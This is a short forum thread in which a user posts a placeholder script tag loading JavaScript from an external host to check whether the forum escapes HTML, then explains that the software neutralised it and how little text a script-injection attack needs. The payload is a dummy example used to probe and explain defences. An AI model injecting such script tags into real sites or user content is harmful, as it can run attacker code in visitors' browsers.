|
#1
|
|||
|
|||
dummy hack test
<script src="http://_.com/_.js"></script>
If you do not see the above line of text , then there is a problem. If the forum software had not converted the line containing the HTML tags, etc. into this: <script src="http://_.com/_.js"></script> then it would have been possible to attempt to run a js script from anywhere on the web in your browser. "dummy" means 1. it's not a real test and/or 2. the poster
__________________
DH |
|
|||
Quote:
<script src="http://_.com/_.js"></script> as the contents of the URL and a click on "Preview Post" showed that the forum software had inserted zero, zilch, nada, thus blocking this kind of attack via the "Insert link" function. As you say, I would have expected that such potential vulnerabilities have been closed long ago. I did not really expect to be able to show up any vulnerability in the first place. The main point of my OP was to show how little text is required to create an attack that could work without any clicking on any link by the user at all, if some vulnerabilities on both sides (server and browser) are unpatched.
__________________
DH |
|
||||
Quote:
|
|
|||
Sounds like about the same level of difficulty as having a girls plus boys slumber party with non-segregated bedrooms and NO hanky panky
__________________
DH |
Thread Tools | |
Display Modes | |
|
|